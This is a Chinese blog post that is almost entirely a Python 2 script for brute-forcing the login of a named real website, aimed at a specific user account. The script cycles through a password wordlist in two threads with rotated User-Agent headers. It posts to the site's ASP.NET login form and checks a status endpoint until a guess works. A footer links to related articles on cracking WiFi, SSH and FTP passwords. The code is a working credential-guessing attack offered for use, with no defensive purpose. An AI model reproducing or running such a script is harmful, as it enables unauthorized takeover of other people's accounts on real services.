通过接口暴力破解密码
2018-02-25 02:20
330 查看
import requests
import threading
import sys
import os
import time
reload(sys)
sys.setdefaultencoding('UTF-8')
url = 'http://web.fangdongliqi.com/'
headers0={
'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
#'Referer':'http://web.fangdongliqi.com/',
}
headers1={
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'
}
def password(password,headers):
postdata = {
'__VIEWSTATE':'/wEPDwUJMzg1Nzk2MjkwD2QWAmYPZBYCAgQPD2QWAh4Hb25jbGljawUTcmV0dXJuIExvZ2luQ2hlY2soKWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEGNrYlJlbWVtYmVyTG9naW7zJ9o8NUSWJe2HBNn+uJCEZE4MsAZKXcjmcaznjUxegw==',
'__VIEWSTATEGENERATOR':'70B4BD4E',
'__EVENTVALIDATION':' /wEdAAeLLYaLFaPgs2NJYQg6uIupjBZTC/Oe9LtyHr1zdRGwGYWDpeI41dtZo7urN/YwNwCFa3z02QmQnYFjj3wKxfjrkmkX6Qg79auoE/whv3XuAKKeKEbp39eHc9mbdvkCgxC2rOhEGxFaPoqg/tPtiGhk78Q8b6/12FGjdZD/nyEYeD6cFj1ZR7BkhunmMZKpK0k=',
'txtLoginUser' : 'xxxxxx@163.com',
'txtLoginPwd' : password,
'txtCode':'',
'hf_LoginCode':'N',
'btnLogin':u'登录',
}
print password
with open('error.txt','a')as f:
f.write(password+'\n')
s = requests.session()
s.post(url, data = postdata,headers=headers)
#r=s.get('http://web.fangdongliqi.com/main.aspx')
#r1=s.get('http://web.fangdongliqi.com/Users/Ajax_ashx/UserInfo.ashx?GetUserInfo=Y&time=Fri%20Jul%2029%202016%2010:41:22%20GMT+0800')
login=s.get('http://web.fangdongliqi.com/Users/Ajax_ashx/UserInfo.ashx?CheckLogin=CheckLogin')
if login.text=='SUCCESS':
print login.text
print 'Done:',password
with open('Done.txt','a')as f:
f.write(password+'\n')
sys.exit()#等价于os._exit()
def test0():
with open("password.txt",'rb')as f:
for line in f.readlines():
lines=line.strip('\n\r\t')
if lines.startswith('0'):
password(lines,headers0)
def test1():
with open("password.txt",'rb')as f:
for line in f.readlines():
lines=line.strip('\n\r\t')
if lines.startswith('1'):
password(lines,headers1)
threads=[]
s0=threading.Thread(target=test0)
threads.append(s0)
s1=threading.Thread(target=test1)
threads.append(s1)
if __name__=='__main__':
for s in threads:
s.setDaemon(True)
s.start()
for s in threads:
s.join()
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 通过BurpSuite和sqlmap配合对dvwa进行sql注入测试和用户名密码暴力破解
- 中国电信某接口可破解某省所有用户服务密码姓名信息并可通过服务密码免费兑换礼品变现
- Wifi密码破解1:通过字典(暴力)破解WIFI密码
- 通过 Pxssh 暴力破解 SSH 密码
- Wifi密码破解1:通过字典(暴力)破解WIFI密码
- [漏洞利用]某站点登录接口暴力破解脚本
- 网络攻防研究第001篇:尝试暴力破解某高校研究生管理系统学生密码
- Kali下通过字典破解WiFi的WPA密码
- winRAR 密码暴力破解/清除压缩文件密码工具
- Python 暴力破解武汉大学图书馆密码程序
- (总结)Linux下的暴力密码在线破解工具Hydra详解
- python暴力破解含密码的zip压缩文件
- Denyhosts 防止暴力破解服务器密码-1
- Denyhosts 防止SSH暴力破解服务器密码-1
- denyhost防止SSH暴力破解、机器扫描、密码猜测
- python编写暴力破解FTP密码小工具
- aircrack-ng暴力破解无线密码攻略
- 暴力破解(重置)linux下root密码
- fail2ban阻止SSH和VSFTP暴力破解密码
- PHP破解wifi密码(wifi万能钥匙的接口)